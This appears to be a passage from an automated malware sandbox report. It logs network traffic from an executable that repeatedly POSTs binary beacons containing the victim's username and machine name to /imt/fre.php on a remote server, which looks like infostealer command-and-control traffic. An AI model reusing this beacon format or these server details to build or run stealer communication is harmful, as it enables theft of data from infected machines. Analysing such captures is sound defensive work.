                  Nov 25, 2021 18:23:41.911195993 CET4982980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:41.914761066 CET4982980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:42.157748938 CET4982980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:42.185556889 CET8049829194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:42.233618021 CET8049829194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:42.233639956 CET8049829194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:42.233769894 CET4982980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:42.233830929 CET4982980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:42.262592077 CET8049829194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:43.379654884 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:44.609067917 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.609219074 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:44.612993956 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:44.640420914 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.640516996 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:44.667843103 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.707284927 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.707828045 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:44.735332012 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.963197947 CET8049833194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:44.965779066 CET4983380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.713177919 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.740890980 CET8049845194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:45.741034031 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.744734049 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.772430897 CET8049845194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:45.772535086 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.839463949 CET8049845194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:45.839569092 CET8049845194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:45.839636087 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.839659929 CET4984580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:45.873326063 CET8049845194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:46.848742008 CET4985180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:46.876563072 CET8049851194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:46.876707077 CET4985180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:46.879978895 CET4985180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:46.908214092 CET8049851194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:46.908288956 CET4985180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:46.935949087 CET8049851194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:47.403832912 CET8049851194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:47.404062986 CET4985180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:47.404071093 CET8049851194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:47.404140949 CET4985180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:47.431801081 CET8049851194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:48.833488941 CET4985580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:48.861296892 CET8049855194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:48.861429930 CET4985580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:48.864530087 CET4985580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:48.892155886 CET8049855194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:48.892277002 CET4985580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:48.919792891 CET8049855194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:48.959682941 CET8049855194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:48.959701061 CET8049855194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:48.959835052 CET4985580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:48.959933996 CET4985580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:48.987483978 CET8049855194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:50.747944117 CET4985680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:50.775763988 CET8049856194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:50.776324034 CET4985680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:51.197910070 CET4985680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:51.225764036 CET8049856194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:51.225828886 CET4985680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:51.253464937 CET8049856194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:51.289370060 CET8049856194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:51.289468050 CET4985680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:53.573219061 CET8049856194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:53.573304892 CET4985680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:53.573335886 CET4985680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:53.877403021 CET4985680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:53.905412912 CET8049856194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:54.994313002 CET4985780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:55.021867990 CET8049857194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:55.021997929 CET4985780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:55.025971889 CET4985780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:55.053472042 CET8049857194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:55.053550005 CET4985780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:55.080974102 CET8049857194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:55.525480032 CET8049857194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:55.525546074 CET8049857194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:55.525753975 CET4985780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:55.525796890 CET4985780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:55.553402901 CET8049857194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:56.446271896 CET4985880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:56.474780083 CET8049858194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:56.474952936 CET4985880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:56.479058027 CET4985880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:56.506938934 CET8049858194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:56.507009983 CET4985880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:56.552824020 CET8049858194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:56.605655909 CET8049858194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:56.605748892 CET4985880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:56.697737932 CET8049858194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:56.697838068 CET4985880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:57.486293077 CET8049858194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:57.486536980 CET4985880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:57.486571074 CET4985880192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:57.514456987 CET8049858194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:59.024177074 CET4985980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:59.051770926 CET8049859194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:59.051870108 CET4985980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:59.056904078 CET4985980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:59.085072041 CET8049859194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:59.085151911 CET4985980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:59.113356113 CET8049859194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:59.210263968 CET8049859194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:59.210369110 CET4985980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:59.210371971 CET8049859194.85.248.167192.168.2.3
                  Nov 25, 2021 18:23:59.210448027 CET4985980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:59.518481016 CET4985980192.168.2.3194.85.248.167
                  Nov 25, 2021 18:23:59.546103001 CET8049859194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:00.726829052 CET4986080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:00.755337954 CET8049860194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:00.755508900 CET4986080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:00.760570049 CET4986080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:00.788341045 CET8049860194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:00.788455963 CET4986080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:00.818100929 CET8049860194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:00.858030081 CET8049860194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:00.858052969 CET8049860194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:00.858198881 CET4986080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:00.858236074 CET4986080192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:00.886174917 CET8049860194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:02.456315994 CET4986180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:02.484718084 CET8049861194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:02.484883070 CET4986180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:02.488225937 CET4986180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:02.517069101 CET8049861194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:02.517215967 CET4986180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:02.585421085 CET8049861194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:02.585443020 CET8049861194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:02.585525036 CET4986180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:02.585558891 CET4986180192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:02.614757061 CET8049861194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:04.127496958 CET4986280192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:04.155462980 CET8049862194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:04.155706882 CET4986280192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:04.158303976 CET4986280192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:04.185689926 CET8049862194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:04.185791016 CET4986280192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:04.213334084 CET8049862194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:04.667956114 CET8049862194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:04.667982101 CET8049862194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:04.668107033 CET4986280192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:04.668147087 CET4986280192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:04.695425034 CET8049862194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:06.200131893 CET4986380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:06.228157043 CET8049863194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:06.228283882 CET4986380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:06.231426001 CET4986380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:06.259320021 CET8049863194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:06.259443998 CET4986380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:06.294764042 CET8049863194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:06.343086958 CET8049863194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:06.343280077 CET8049863194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:06.343302011 CET4986380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:06.343343973 CET4986380192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:06.371068954 CET8049863194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:07.913661957 CET4986580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:07.941509008 CET8049865194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:07.941646099 CET4986580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:07.945362091 CET4986580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:07.980093002 CET8049865194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:07.980170012 CET4986580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:08.008744001 CET8049865194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:08.055053949 CET8049865194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:08.055162907 CET4986580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:08.055186987 CET8049865194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:08.055239916 CET4986580192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:08.082942009 CET8049865194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:09.114893913 CET4986680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:09.143146992 CET8049866194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:09.147073030 CET4986680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:09.150415897 CET4986680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:09.178633928 CET8049866194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:09.178721905 CET4986680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:09.209146023 CET8049866194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:09.249567986 CET8049866194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:09.249821901 CET4986680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:09.250066042 CET8049866194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:09.250180960 CET4986680192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:09.277338982 CET8049866194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:10.224569082 CET4986780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:11.252933025 CET8049867194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:11.253093004 CET4986780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:11.256726027 CET4986780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:11.284295082 CET8049867194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:11.284368038 CET4986780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:11.311822891 CET8049867194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:11.963359118 CET8049867194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:11.963387012 CET8049867194.85.248.167192.168.2.3
                  Nov 25, 2021 18:24:11.963500023 CET4986780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:11.963557005 CET4986780192.168.2.3194.85.248.167
                  Nov 25, 2021 18:24:11.991802931 CET8049867194.85.248.167192.168.2.3

                  HTTP Request Dependency Graph

                  • 194.85.248.167

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349744194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:15.658540010 CET1080OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 190
                  Connection: close
                  Nov 25, 2021 18:22:15.688220978 CET1081OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: 'ckav.ruhardz141700DESKTOP-716T771k08F9C4E9C79A3B52B3F739430tqURv
                  Nov 25, 2021 18:22:17.612982035 CET1081INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:15 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 15
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.349745194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:18.837898016 CET1082OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 190
                  Connection: close
                  Nov 25, 2021 18:22:18.866183996 CET1082OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: 'ckav.ruhardz141700DESKTOP-716T771+08F9C4E9C79A3B52B3F739430FKPvS
                  Nov 25, 2021 18:22:20.563548088 CET1082INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:18 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 15
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.349756194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:37.775846004 CET1116OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:37.803760052 CET1116OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:39.011204958 CET1117INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:37 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.349757194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:40.734394073 CET1118OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:40.762463093 CET1118OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:41.150240898 CET1118INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:40 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.349758194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:44.172504902 CET1119OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:44.200690031 CET1119OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:44.258064032 CET1120INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:44 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.349759194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:45.537822008 CET1120OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:45.566334963 CET1121OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:45.824769974 CET1121OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:46.363115072 CET1121INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:45 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.349760194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:47.475042105 CET1122OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:47.502764940 CET1122OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:47.564037085 CET1123INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:47 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.349761194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:48.480655909 CET1123OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:48.508594036 CET1124OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                  Nov 25, 2021 18:22:48.579071045 CET1124INHTTP/1.0 404 Not Found
                  Date: Thu, 25 Nov 2021 17:22:48 GMT
                  Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Content-Length: 23
                  Connection: close
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.349762194.85.248.16780C:\Users\user\Desktop\U001P56ybm.exe
                  TimestampkBytes transferredDirectionData
                  Nov 25, 2021 18:22:51.071537018 CET1125OUTPOST /imt/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 194.85.248.167
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 3D93679C
                  Content-Length: 163
                  Connection: close
                  Nov 25, 2021 18:22:51.099267006 CET1125OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 31 00 34 00 31 00 37 00 30 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                  Data Ascii: (ckav.ruhardz141700DESKTOP-716T77108F9C4E9C79A3B52B3F739430
